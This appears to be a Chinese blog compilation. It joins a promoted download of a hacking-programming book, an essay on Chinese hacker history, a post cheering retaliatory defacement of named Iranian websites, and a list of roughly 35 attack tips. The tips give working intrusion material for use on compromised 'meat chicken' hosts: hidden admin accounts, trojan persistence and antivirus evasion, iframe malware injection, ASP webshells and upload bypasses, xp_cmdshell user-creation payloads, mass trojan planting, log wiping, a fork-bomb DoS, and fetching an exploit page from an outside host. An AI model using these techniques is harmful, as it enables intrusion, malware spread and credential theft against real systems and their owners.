全名为《Hack编程实例精讲II—精通黑客编程》，非安全Nohack出的书，作者还是个大一的计算机专业学生写的，编程语言为VC++。不知道写得怎么样，因为我一般都用Delphi，VC只懂点皮毛，无福消受，送给那些需要的朋友们。这份PDF网上不难下载到，但是这本书自带光盘里的代码恐怕不是那么容易能找到的，本站提供下载。
　

《精通黑客编程》完整目录如下：

第一章  黑客基础编程知识
1.1  黑客编程概述        10
1.1.1  黑客与编程        10
1.1.2  编程语言简介        11
1.2  VC编程基础        12
1.2.1  建立第一个无窗口工程        12
1.2.2  API编程基础        13
1.2.3  用VC写一个恶作剧程序        14
1.3  WINDOWS系统编程基础        15
1.3.1  网络通信编程基础        15
1.3.1.1  网络协议讲解        16
1.3.1.1.1  TCP/IP协议的组成        16
1.3.1.1.2  基于TCP/IP协议的数据传输        17
1.3.1.2  winsock编程基础        18
1.3.2  文件操作编程        27
1.3.2.1  文件读写编程        27
1.3.2.2  文件的复制、移动和删除        30
1.3.3  注册表编程基础        31
1.3.4  进程和线程编程        35
1.3.4.1  进程编程        35
1.3.4.2  线程编程        38
1.3.5  动态链接库编程        42

第二章  基本后门的编写
2.1  后门概述        48
2.1.1  后门的发展历史        48
2.2  简单cmdshell的实现        49
2.2.1  管道通信技术        50
2.2.2  正向连接后门编程        51
2.2.2.1  双管道后门        51
2.2.2.2  单管道后门        56
2.2.2.3  零管道后门        57
2.2.3  反向连接后门        58
2.2.4  补充（实现多连接）        59
2.3  开启远程终端的实现         60
2.4  文件查找         63
2.5  重启、关机、注销        68
2.6  实现http下载文件        71
2.7  实现cmdshell和各功能的切换        73
2.8  自启动功能的实现        76
2.8.1  注册表启动        76
2.8.2  Active X启动        78
2.8.3  系统服务启动        80
2.8.4  SVCHOST.EXE加载启动        90

第三章  高级系统后门编程实现
3.1  远程线程技术        96
3.1.1  初步的远程线程注入技术        96
3.1.2  编写远程线程注入后门        101
3.1.3  远程线程技术的发展        103
3.2  端口复用后门        106
3.2.1  后门思路        107
3.2.2  具体编程实现        107

第四章  密码截获技术
4.1  基于钩子的密码截获技术        112
4.2  非钩子密码截获技术        124

第五章  API HOOK编程实现
5.1  HOOK API的实现        130
5.1.1  API HOOK的原理        130
5.1.1.1  PE文件的导入表        131
5.1.1.2  定位导入地址表（IAT）        135
5.1.2  实现简单的API HOOK        138
5.2  用API HOOK编写一个进程保护器        143

第六章  数据包嗅探编程
6.1  原始套接字基础        148
6.2  利用ICMP原始套接字实现ping程序        149
6.3  基于原始套接字的嗅探技术        152
6.4  利用Packet32实现ARP攻击        158

第七章  黑客程序的配置和配置信息的保护
7.1  文件生成技术        168
7.1.1  资源法生成文件        168
7.1.2  附加文件法生成文件        171
7.2  黑客程序的配置        175
7.2.1  数据替换法        175
7.2.2  附加信息法        180
7.3  配置信息的保护        182
7.3.1  配置信息的文件保护        183
7.3.2  配置信息的内存保护        184

第八章  流行的黑客编程技术
8.1  实现盗号程序的http发信        188
8.1.1  HTTP请求数据包的构造        188
8.1.2  实现HTTP发送用户信息        191
8.2  SDK编写SQL注入工具        193
8.3  编写U盘感染程序        199

《精通黑客编程》PDF完整版+光盘代码下载

　　在中国互联网成长的道路上，有许多事情我们必须提起，有太多的事情我们必须铭记。回顾那段历史，我们有过迷茫，我们有过辉煌与理想，同样也经历了一次次的困惑与无奈。当我和安全界的朋友在策划这个专题的时候，我们又一次的翻开了中国互联网的发展史，在这本厚重的书中我们努力找寻着中国黑客与安全事业的发展历程，找寻着那段属于中国黑客自己的历史……

　　温故1994：中国黑客的起源（1994年－1996年）

　　那个时期是中国互联网处于刚刚开始发展的朦胧时期，也就是在这一年，中国互联网的大门终于面向公众开放了。但是在那个年代，电脑还是一件非常奢侈的电子用品，而互联网对于大众来说更是一个陌生的名词，我们只有在专业性极强的书刊中能够找到与网络相关的名词，而那些上网的群体也多数为科研人员和年轻知本家（那个时候小资群体还没有提出）。各地电脑发烧友最大的乐趣就是COPY那些小游戏和DOS等软件类产品，盗版对我们来说还是一个陌生的名词，对于广大计算机用户来说，COPY就是正版的一种传播方式。于是乎那个时代最早的黑客或者说“窃客”诞生了。那个时候我们没有太多的理想和豪言壮语，一个全新的小软件就几乎是我们计算机的全部生命与理解，而对于这些窃客来说能够COPY到国外的最新产品是他们最大的荣幸，那一张张的小软盘中承载了中国黑客最初的梦想。也正是从那个时期起，雷军等众多我们现在熟知的人从这里引领起中国软件与互联网业发展的浪潮。

　　在那个中国网络最为朦胧的岁月里，大多数玩家操作着比9600 Bits/s还小的雏猫，在最为原始的网络上奔驰。那不是我们现在传统意义上的Internet，而是最为初级的BBS站，一种依靠拨电话号码直接连接到BBS服务器上的方式来交流。他们上的最多的是中国惠多网，而非Internet。足球和软件加解密成为最热门的话题，注册码的交换让许多人乐此不疲。更多的BBS方式的服务器在全国各大城市出现，软件的交换破解成为最为热门的话题，单单一套Linux就能够卖到1200元。那个时代的玩家现如今均已成为了驰骋互联网的风云人物，有些名字我们不得不提起：
周志农－自然码发明人，开创大自然BBS站。
马化腾（Pony Ma）－腾讯公司总裁，中国惠多网第一批网友。
求伯君－金山公司总裁，开创西线和西点BBS站。
罗依（Roy Luo）、钟东（Dr.Arab）、潘德强……
这些我们熟悉或者不太熟悉的人们，在那个年代，以他们特有的方式进行着中国网络人特殊的梦，也以他们的方式孵化出中国第一代黑客的雏形－窃客。

　　时光转眼到了1996年，在中国网民的年代分类中，在1996年以前接触网络的人均被称之为中国的第一代网民，或许在这其中有些人从来没有接触过Internet，所接触的最多也是那种电话连接的BBS，但是他们仍然无愧于中国第一代网民。1995年－1996年这一期间，中国各个大中城市的互联网信息港基本已经初具规模，中国国际互联网的第一代网管诞生，中国第一代的大众网民也开始走出BBS，而融入这种天地更为广阔的Internet。那两年是中国互联网初步成长时期，也同样是中国软件业开始蓬勃发展的时期。那个平静的年头中，中国网络人以自己的方式做着自己的梦，在这些人中很多是接触过早期BBS的网友，在他们看来，从BBS移师Internet只不过将自己的舞台扩大了一些，让自己的眼睛看得更多了一些。而他们在BBS上最初所进行的那些活动也迁移到了Internet这个更为广阔的空间。在这一期间中国网络窃客技术飞速发展，也从此诞生了一批传奇式人物，这里面最为出名的当属高春辉，他的个人主页在当时以破解软件和注册码为主，在那个软件极度匮乏的时期，他创造了中国个人网页访问量第一的传奇历史。当然在那个阶段，除了窃客以外，电话飞客也曾出现在中国，但是由于程控交换机的出现，飞客很快的成为了历史。1996年底，中国电信开始实行优惠上网政策，在此之后中国网络开始了真正步入百姓家庭的步伐。

　　温故1997：中国黑客的成长（1997年－1999年）

　　1997年在中国互联网发展史应该是最为值得纪念的一年，而在中国黑客成长过程中，那一时期也哺育了众多的初级黑客，互联网这一个名词也逐渐被大众接受，新的思想，新的观念也逐渐从网络中折射出来。在1997年初期，YAHOO搜索引擎中只能够搜索出7个跟黑客相关的简体中文网页。而且网站中的内容多数是翻译或者重复国外相同网页的内容，很多没有实际意义。不过此时“黑客”这一个名词已经开始正式的深入广大网友之中，当时初级黑客所掌握的最高技术仅仅是使用邮箱炸弹，并且多数是国外的工具，完全没有自己的黑客武器，更不要说自己的精神领袖。那个时期世界上的黑客共同有追随着一个精神领袖：凯文•米特尼克，世界头号黑客。这位传奇性人物不单单的领导着美国黑客的思想，也影响着中国初级黑客前进与探索的方向。

　　1998年正当我们国内开始轰轰烈烈的开展互联网大跃进活动的时期，在大洋彼岸的美国，一年一度的黑客大会上由一个名为“死牛崇拜”黑客小组公布了一款名叫“Back Orifice”的黑客软件，并将源代码一起发布。这个软件掀起了全球性的计算机网络安全问题，并推进了“特洛伊木马”这种黑客软件的飞速发展。BO公布后，透过刚刚兴起的互联网迅速传到了中国，当时很多网友就是使用这款软件开始了对黑客生涯的初恋。但是BO并没有在中国掀起浪潮，当然因素是多种多样的，比如网络尚在发展中，BO为舶来品不方便中国网友使用等。但是BO没有辉煌的另一个主要原因是CIH病毒的诞生和大规模发作。这个有史以来第一个以感染主板BIOS为主要攻击目标的病毒给中国经济带来了数百亿元的损失，也让大陆黑客第一次感受到了来自海峡对面的野心与威胁。

　　1998给还处在发育期的中国黑客带来了太多的惊奇、恐惧、理想与动力。在BO诞生不久，中国黑客自己的特洛伊木马也诞生了，这就是网络间谍NetSpy。但是NetSpy的诞生并没有给中国黑客的发展带来太大的震动，这一切都让CIH的光芒所掩盖了。在随后的日子里以谢朝霞、PP（彭泉）、天行（陈伟山）等为代表程序员黑客开始显露头角，少量的国产工具开始小范围流行于中国黑客之间。当大家正在忙于为杀毒而忙得不可开交的时候，一次国际性事件掀起了中国黑客首次浪潮。

　　1998年7－8月份，在印度尼西亚爆发了大规模的屠杀、强奸、残害印尼华人的排华事件。众多华人妇女被野蛮的强奸杀害，华人的超市被抢夺一空，很多丧失人性的印尼反华分子还将大量残害华人的图片发到了互联网上。这一系列行为激怒了刚刚学会蹒跚走步的中国黑客们，他们不约而同的聚集在IRC聊天室中，并以八至六人为单位，向印尼政府网站的信箱中发送垃圾邮件，用Ping的方式攻击印尼网站。这些现在看来很幼稚的攻击方法造就了中国黑客最初的团结与坚强的精神，为后来的中国红客的形成铺垫了基础。为了号召更多的人加入战斗，有几位技术性黑客牵头组建了“中国黑客紧急会议中心”负责对印尼网站攻击期间的协调工作。印尼排华事件造就了一大批网友投身于黑客这项活动中来，有些人在攻击过后又回到了现实生活中，有些人则从此开始了对黑客理想的执著追求。同样这次事件也使得“绿色兵团”这个黑客组织的名字享誉中国互联网，并造就了后来的“中联绿盟”。

　　轰轰烈烈的印尼排华事件过后，中国黑客似乎又回归于平静，继续着对理想的执著追求与探索，UNIX、Linux、Http、FTP等网络技术性问题和黑客技术成为了中国黑客的主要话题，无力的反击让中国黑客开始有了新的反省，同样也激励起他们旺盛的斗志，他们如饥似渴的摄取技术养分，黑客技术性网站也开始逐渐增多，新的黑客技术高手也再次涌现，这一时期最具代表性的技术性黑客当属流光、溯雪、乱刀等黑客软件的开发者－小榕，以后的日子中，小榕执著的追求着自己的理想，使流光等这些优秀的软件在一次次升级与完善中走进了世界优秀黑客软件的舞台。

　　1999年中国的互联网用户突飞猛增，创造了历史同期增长最快的水平，但是那一年也成为了每一个中国人和中国黑客难忘的一年，这一年在中国黑客发展的历史上是永远不可抹掉的一笔。那一年的4－5月份以美国为首的北约以种种借口对南斯拉夫塞尔维亚共和国发动了战争，随后的日子里中国人民在各种媒体发表了对正义的声援，网络上更是掀起了对美国霸权主义的批判浪潮。但是就在5月份，美国的轰炸机竟悍然轰炸了我驻南联盟大使馆。消息一经传出，举国上下为之震惊与愤怒，全国各高校学子更是义愤填膺，水木清华等全国各大网站论坛的帖子与信息流量达到了历史的最高峰。

　　在战争的初期，中国黑客的行动仅仅限于声援南联盟人民，并没有采取过多的过激行为。但当我驻南联盟大使馆被毫无理由的轰炸后，中国黑客又一次大规模的团结了起来，纷纷开展了对美国网站的攻击。一直作为奋斗理想的美国黑客精神迅速的被遗弃了，一时间，中国的黑客没有了自己心目中的精神领袖，有的只是满腔的愤怒。在中国大使馆被炸后的第二天，第一个中国红客网站诞生了，同时也创造出了一个新的黑客分支－红客。中国红客网站长分析家在看完中午的新闻后，以半个小时的时间做完了这个网站，并初步定名为“中国红客之祖国团结阵线”（随后的7月份改名为中国红客之祖国统一战线），以宣扬爱国主义红客精神为主导，网站宣言中不乏铿锵激扬的爱国词语，并引用了毛泽东青年时的话语：“国家是我们的国家，人民是我们的人民，我们不喊谁喊？我们不干谁干？”极负煽动力。网站在短短的数天内访问量已达50多万，并出现在新浪网的新闻链接中，中国红客从此成为了世界黑客中特殊的一个群体，爱国与团结是他们永恒的精神理念。那次黑客战争中，全世界的华人首次团结一致，众多美国网站被攻击，大规模的垃圾邮件也使得美国众多邮件服务器瘫痪失灵，这次伟大的卫国黑客战争取得了全面的胜利。

　　一切刚刚回归宁静不久，就在七月份，台湾李登辉突然抛出了两国论，海峡两岸局势顿时紧张。中国黑客依靠由对美网络反击战中总结出的经验，迅速的攻击了台湾行政院等网站，并给许多台湾服务器安装了木马程序，导致很多鼓吹台独的网站服务器长时间瘫痪。值得一提的是，此次安装的木马程序由美国的BO首次改为了中国黑客自己研发的“冰河”与NetSpy。而木马冰河也成为了中国黑客最为钟爱的木马程序。

　　木马冰河是中国黑客史中必须提到的一个软件，它由中国安全程序员黄鑫编写，黄鑫在最初开发这个软件最初版本的时候并没有考虑到它能够作为一个特洛伊木马来使用，但随后冰河疯狂流行于黑客手中，很多用户在不知不觉中被冰河控制。早期的冰河还不能算是一个好的木马软件，随后黄鑫用了大量的时间对冰河进行代码重构，冰河2.2版本诞生了。新版本的冰河迅速被流传出去，并让大批初级黑客快速的步入了黑客这扇大门。中国黑客软件的开发从此走向了新的纪元，再次之后，黑洞、网络神偷、灰鸽子、XSan、YAI等众多优秀的国产黑客软件纷纷涌现，黑客也开始出现商业化迹象，由前“绿色兵团”成员组建的“中联绿盟”网络安全公司成立，正式开始了黑客向商业化迈进的脚步，中国黑客逐渐成长了起来。

　　走向2003：浮躁的欲望（2000年－2002年）

　　2000年成为了中国网络最为辉煌的一年，网吧也在全国各地蜂拥出现，上网的人群更是增加了一倍多。一时间“你上网了吗？”成为了流行问候语。与此同时中国的黑客队伍也在迅速扩大着，众多的黑客工具与软件使得进入黑客的门槛大大降低，黑客不再是网络高手的带名词，很多黑客很有可能就是一个嘴里叼着棒棒糖手里翻着小学课本的孩子。也正是因为这种局面的出现，中国黑客的队伍开始杂乱。

　　2000年初“东史郎南京大屠杀”事件的败诉再次激起一些黑客的民族主义情绪，国内部分黑客发动了针对日本网站的攻击，也对一些台湾网站发起攻击。由于并没有太多的轰动力而没有产生多大的影响，反而值得注意的是很多国内的黑客组织有雨后春笋般纷纷诞生。此外也是在这一年，一个全新的概念“蓝客”也被提了出来。这时国内的黑客基本分成三种类型，一种是以中国红客为代表，略带政治性色彩与爱国主义情结的黑客。另外一种是以蓝客为代表，他们热衷于纯粹的互联网安全技术，对于其它问题不关心的技术黑客。最后一种就是完全追求黑客原始本质精神，不关心政治，对技术也不疯狂的追捧的原色黑客。当然在这一年中，中国黑客群体的扩大导致了众多伪黑客的出现，在这些伪黑客群体中以满舟的炒作《黑客攻击防范秘技》事件最为突出。这名自成为中国安全将军的高中生少年抄袭了国内大量黑客的文章和作品，然后堂而皇之的署上自己的名字交由一家电子出版公司炒作出版。这本错字连篇且只能算是电子出版物（电子出版物与正式书刊不同）的小册子正式的揭开了中国伪黑客的行为推向了极致。此后很多对技术一窍不通的伪黑客以各种方式上演了一幕幕的闹剧，不但亵渎了中国黑客的精神，也成为中国黑客史上最为肮脏的角落。

　　跨入新的世纪后之后，日本的排华情绪日益嚣张，三菱事件、日航事件、教科书事件和《台湾论》等激怒了中国黑客。由国内几个黑客网站牵头，组织了几次大规模的对日黑客行动，这个时期一些傻瓜型黑客软件也涌现出来，最为著名的当数孤独剑客的“中国男孩儿”。技术门槛的降低致使很多青少年黑客出现，现成的工具，现成的软件武装了这些对网络技术一无所知的青年，但也造成了后期的年轻黑客对技术的无知与轻视。

　　由于国内黑客炒作已经到达了白热化的程度，各种媒体和小报一时间对于黑客这个名词感兴趣的程度大幅的提高。而安全公司更是希望能够抓住这个机会炒作一番，海信公司的8341防火墙挑战全球黑客就是那时期上眼的最为热闹的大戏，并拿出了50万元这个诱人的数字来做为活动的奖金，一时间安全圈所有的话题都集中在海信的防火墙上。可正当黑客高手们正在为如何突破防火墙而苦苦寻觅的时候，戏剧性的一幕发生了，海信公司的网站被黑了。黑客对海信公司冷嘲热讽了一通，并对海信的测试表示了质疑。但是由于黑客攻击的不是海信给出的测试网址，50万元钱的奖金他也不能够拿走，最终还是被海信充了公。这场异常热闹的闹剧也草草的收场了。

　　2001年4月1日，我国南海地区发生了“中美撞机事件”后，美国一个名为PoizonBOx黑客组织率先向我国的一些网站发起了恶意的进攻。中美黑客产生了一些小的摩擦。到了五•一假期期间，许多中国黑客拿起了手中的武器，大规模的向美国网站展开进攻，并号称有“八万人”至多。但事后证明这样不过是一群小孩子的涂鸦游戏，再经媒体炒作后上演了一场“爱国秀”的闹剧。八万人中大多数对网络知识一无所知，所使用的方式竟然仍是几年前的垃圾邮件和Ping，此外很多伪黑客用PhotoShop制造出的大量的虚假信息也成为这次“爱国秀”的最大败笔。不过由于此次黑客行动的炒作，导致了众多媒体对中国黑客的关注，让很多人了解中国互联网上的这一特殊群体。

　　在随后的反思中，中国黑客思想开始逐渐成熟，众多黑客纷纷再次回归技术，没有在热衷于媒体的炒作。黑客道德与黑客文化的讨论和延伸也让中国黑客逐步的重返自然状态，致力于对网络安全技术的研究。

　　相对于现在的中国黑客现状来说，中国黑客针对商业犯罪的行为不多，报刊出现一些所谓的商业黑客犯罪行为，实际上多属采用物理手段，而非网络手段。尽管见诸于报端的中国黑客行为多体现为某种程度上的爱国情绪的宣泄，但是黑客行为毕竟大部分是个人行为，如果不加引导，有发展成计算机网络犯罪的可能。但是客观地说，中国黑客行动对我国网络安全起到了启蒙作用，没有黑客，就没有网络安全这个概念。同时，一批黑客高手已转变为网络安全专家，他们发现安全漏洞，研发出众多安全技术和安全软件，对我国计算机或网络的发展做出了贡献。

　　手记小结

　　本文写到这里告一段落，短短的几天时间里，我们回顾了自中国互联网诞生以来的所有影响中国黑客发展的事件和人。有些是沉痛的，有些是充满激情的。但是无论怎样我们都希望看到中国黑客将从上个世纪下载来的激情继续发挥，并继续成接着中国黑客那种刀锋般锐利的思想。温故中被提及的名字和事件只是一部分，很多黑客与黑客事件也许被忽略掉了，但是他们对中国网络安全事业做出的贡献是我们永远无法忘记。许榕生、中国鹰派、netcc、袁哥等名字我们虽然无法一一记载，但中国安全事业的发展是与他们无法分开的。

　　温故中国黑客史，让我从不曾有过这样的激动和颤栗。真诚不是错误，年少也不是错误。时光静静地流过岁月的河床，有一天我们终会苍老如云，而那时他依然年轻。或许人们不知道，他留给我的一切是怎样充实自我日渐衰竭的生命……

　　当你白发苍苍的时候，当你垂暮之年的时候，你再一次回到计算机前，回到那个心灵曾经找寻过迷失过的网络中，你会清楚的发现，在厚厚的灰尘之下，仍然会残留着富有传奇的身影和保有激情的震撼。当你回到那个生你养你的小镇度过你苍老的余生的时候，对着儿孙，是否会讲起那段活的像电影一样的日子，温故那段活的像电影一样的黑客岁月……（全文完）

（谨以此文献给所有为中国网络安全事业作出贡献的人们）
作者：苗得雨

网友补充

　　1、1994-1996最大的网络用户群不是惠多，而是教育网，当时最大的与网络有关的事件是1996保钓事件，北大清华学生通过网络约定游行示威，后被学校强力弹压，北大BBS关站导致水木清华在很长时间内一枝独秀，实际上水木清华在很长时间一直是国内人气最高的社区。很多如caoz 这样的早期用户是校园网里起步的（而且速度很快，>>9600bps，因为当时用户少），而不是拨号BBS。

　　2、2000-2002年最值得纪念的事情是中国安全专家能够发布一些系统级安全漏洞，而不再是盲目的跟风者，2000年微软全球公布的100多个安全漏洞里，有6个市中联绿盟袁哥（袁仁广）发现的，更值得记录的是大规模的红色代码，蓝色代码，nimda病毒的传播，其实根源就是利用了袁哥发现的IIS Unicode漏洞。目前在CVE,Bugtraq等国际权威的安全研究机构，中国发布的安全漏洞和问题报告已经有相当数量，到CVE官方网站搜索一下nsfocs就能体会到。发现系统级安全漏洞和编写木马，已经不是一个层面的问题了，参见笔者专栏里的有关黑客文章。

　　3、可以补充一些国际背景资料，华人创建和领导的安全公司在全球是有领先地位的，全球市场第一的netscreen是两个清华留美研究生创建的，如果*我没记错，熊猫科技，趋势科技也是华人掌舵，还有王嘉廉管理的CA。
　　目前国内安全公司也正在朝国际化前进，启明星辰，中联绿盟，中科网威，玛赛网络都在努力中，安络科技因为技术骨干纷纷出走，已经江河日下，只能死守华南，无力逐鹿中原。偏安西域的安盟科技在java,Web CGI方面有过人之处，但是全面实力并不均衡，作为整体的安全服务商显然还远远不够。

　　前两天小站上刚刚写过一篇关于“百度被黑，中国黑客进行反击”的文章，今天我们来讲讲百度是怎么被黑的？百度被黑的原理是什么？

　　我想大家应该也很奇怪，百度这么强大的网站怎么可能被黑？其实，百度网站并没有被入侵，只是www.baidu.com这个域名被重定向到了另外的地方。下面两张图详细讲解了百度被黑的原理或过程，是网上找的，有兴趣的朋友可以看一下。

百度被黑的原因是什么？

我们看到百度被黑的网页清清楚地写着“This site has been hacked by iranian cyber army”，意思就是这个网站被伊朗网络军所黑。

在伊朗的华人怀疑百度被黑是“伊朗网军”报复中国网民，那么为什么要报复中国网民呢？伊朗黑客攻击百度的原因，据说是为了抗议早先（2009年12月27日）中国网民在Twitter上对伊朗反对派的支持。

有中国专家认为，网民的举动有可能落入西方的圈套。西方媒体最近正在非议中国阻止联合国对伊朗实施新制裁。美国《华尔街日报》11日的文章将两国称为“中伊轴心”。中国前驻伊朗大使华黎明12日对中国媒体表示，百度被黑一事非常奇怪，虽然中伊关系因核问题有些变化，但不至于出现类似事件，“目前找不出伊朗 攻击中国网络的动机”。

百度被黑损失了多少？

据百度财报显示，百度第三季度总营收为人民币12.787亿元，平均每日营收达1420万元。据业内人士估测，此次被黑事件将给百度造成至少半天以上的损失，损失数字将在700万元以上。资深业内人士认为，损失700万元还只是体现在账面营收上，其他方面影响也是不可估量的，不亚于当年央视对百度的批评报道。

中国黑客进行了反击

昨天百度被黑后，中国黑客红客们进行了反击，黑掉伊朗的几个大站包括有：

http://www.diabetes.ir

http://room98.ir/

http://pankration.gov.ir/

http://www.iribu.ir/

http://www.mousavian.ir/

到昨天晚上为止，以上网站都还无法访问，以下是我亲自截的图：

看到上面的图，你是不是很激动呢？！

本日志专门收集整理平时学习过程的黑客技术与技巧。

1、Xp系统修改权限防止病毒或木马等破坏系统，cmd下，
cacls C:\windows\system32 /G hqw20:R
思是给hqw20这个用户只能读取SYSTEM32目录，但不能进行修改或写入
恢复方法：C:\>cacls C:\windows\system32 /G hqw20:F

2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件，运行对话框中输入Iexpress。

3、内网使用灰鸽子，肉鸡上vidcs.exe -p端口，本地VIDCS里，VIDCS服务IP 填肉鸡的IP，VIDCS服务端口，就是给肉鸡开的端口，BINDIP添自己的内网IP，BIND端口 添8000，映射端口添8000。

4、建立隐藏帐号，上次总结了用guest建立隐藏的管理员，这次再介绍一种，在cmd下建立一个ating$的用户，然后注册表下复制管理员的1F4里的F 值到ating$的F值，再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号

5、利用INF文件来修改注册表
[Version]
Signature=”$CHICAGO$”
[Defaultinstall]
addREG=Ating
[Ating]
HKCU,”Software\Microsoft\Windows\CurrentVersion\Policies\system”,”disableregistrytools”,”0×00010001″,”1″
以上代码保存为inf格式，注意没有换行符，在命令行里导入inf的命令如下：
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
其中HKEY_CLASSES_ROOT 简写为 HKCR，HKEY_CURRENT_USER 简写为 HKCU
HKEY_LOCAL_MACHINE 简写为 HKLM，HKEY_USERS 简写为 HKU
HKEY_CURRENT_CONFIG 简写为 HKCC
0×00000000 代表的是 字符串值，0×00010001 代表的是 DWORD值
“1″这里代表是写入或删除注册表键值中的具体数据

6、关于制作穿xp2防火墙的radmin，大家一定要会，各大黑客网站都有动画,
多了一步就是在防火墙里添加个端口，然后导出其键值
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]

7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项，再在service.exe项建立一个Debugger的键（字符串值），键值填ating.exe的全路径。

8、将ftp.exe传到服务器用来提权，可以先把它变成ating.gif格式的再用，迷惑管理员。

9、有时候在我们进入了网站后台，但是没有上传图片和备份等功能，得不到webshell,
可是不能白来一场，可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。

10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”

11、我们中了盗密码的木马后不要急于删除，一般这些木马都是把密码发到指定邮箱，我们可以用探嗅软件来找到邮箱的用户名和密码，比如安全焦点的xsniff，
用法：xsniff –pass –hide –log pass.txt

12、google搜索的艺术
搜索关键字：“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
或“字符串的语法错误”可以找到很多sql注入漏洞。

13、还可以搜一些木马的关键字，比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。

14、cmd中输入 nc –vv –l –p 1987
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃

15、制作T++木马，先写个ating.hta文件,内容为
<script language=”VBScript”>
set wshshell=createobject (“wscript.shell” )
a=wshshell.run(“你马的名称”,1)
window.close
</script>
再用mshta生成T++木马，命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。

16、搜索栏里输入
关键字%’and 1=1 and ‘%’=’
关键字%’and 1=2 and ‘%’=’
比较不同处 可以作为注入的特征字符

17、挂马代码<html>
<iframe src=”马的地址” width=”0″ height=”0″ frameborder=”0″></iframe>
</html>

18、开启regedt32的SAM的管理员权限 检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,
net localgroup administrators还是可以看出Guest是管理员来。

19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
用法: 安装： instsrv.exe 服务名称 路径
卸载： instsrv.exe 服务名称 REMOVE
[url=/soft/instsrv.rar]点击本站下载[/url]

21、SQL注入时工具—Internet选项—高级里找到显示友好的错误信息勾去掉
不能注入时要第一时间想到%5c暴库。

22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测，也就是说，他会检测文件是不是有.jpg，那么我们要是把文件改成：ating.jpg.asp试试。。由于还是ASP结尾，所以木马不会变~

23、缺少xp_cmdshell时
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’
假如恢复不成功,可以尝试直接加用户(针对开3389的)
declare @o int
exec sp_oacreate ‘wscript.shell’,@o out
exec sp_oamethod @o,’run’,NULL,’cmd.exe /c net user ating ating /add’ 再提到管理员

24.批量种植木马.bat
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
扫描地址.txt里每个主机名一行 用\\开头

25、在程序上传shell过程中，程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request(“l”)%>,我们来把他的标签换一下： <script language=VBScript runat=server>execute request(“l”)</Script> 保存为.asp,程序照样执行。

26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马

27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
然后用#clear logg和#clear line vty *删除日志

28、电脑坏了省去重新安装系统的方法
纯dos下执行，
xp:copy C:\WINDOWS\repair\*.* 到c:\windows\system32\config
2k: copy C:\winnt\repair\*.* 到c:\winnt\system32\config

29、解决TCP/IP筛选 在注册表里有三处，分别是：
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令来导出注册表项
然后把三个文件里的EnableSecurityFilters”=dword:00000001，
改成EnableSecurityFilters”=dword:00000000 再将以上三个文件分别用
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。

30、使CHM木马无法在本地运行木马程序 将注册表”HKEY_CURRENT_U
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0″下的1004项的值由原来十进制的0改为十六进制的3

31、全手工打造开3389工具
打开记事本，编辑内容如下：
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为BAT文件，上传至肉鸡，执行

32、挂马js代码document.write(‘<iframe height=0 width=0 src=”木马地址.htm”></iframe>’);保存到js页面里 可让所有页面挂马

33、让服务器重启
写个bat死循环:
@echo off
:loop1
cls
start cmd.exe
goto loop1
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启

34、如果你登录肉鸡的3389时发现有cmd一闪而过，那你可要小心了，管理员写了个bat在监视你，
@echo off
date /t >c:/3389.txt
time /t >>c:/3389.txt
attrib +s +h c:/3389.bat
attrib +s +h c:/3389.txt
netstat -an |find “ESTABLISHED” |find “:3389″ >>c:/3389.txt
并保存为3389.bat
打开注册表找到：Userinit这个键值 在末尾加入3389.bat所在的位置，比如我放到C盘，就写：,c:/3389.bat,注意一定要加个逗号

35、有时候提不了权限的话，试试这个命令，在命令行里输入：
start http://www.hack520.org/muma.htm然后点执行。（muma.htm是你上传好的漏洞网页）
输入：netstat -an | find “28876″ 看看是否成功绑定，如果有就telnet上去，就有了system权限，当然也可以nc连接，本地执行命令。

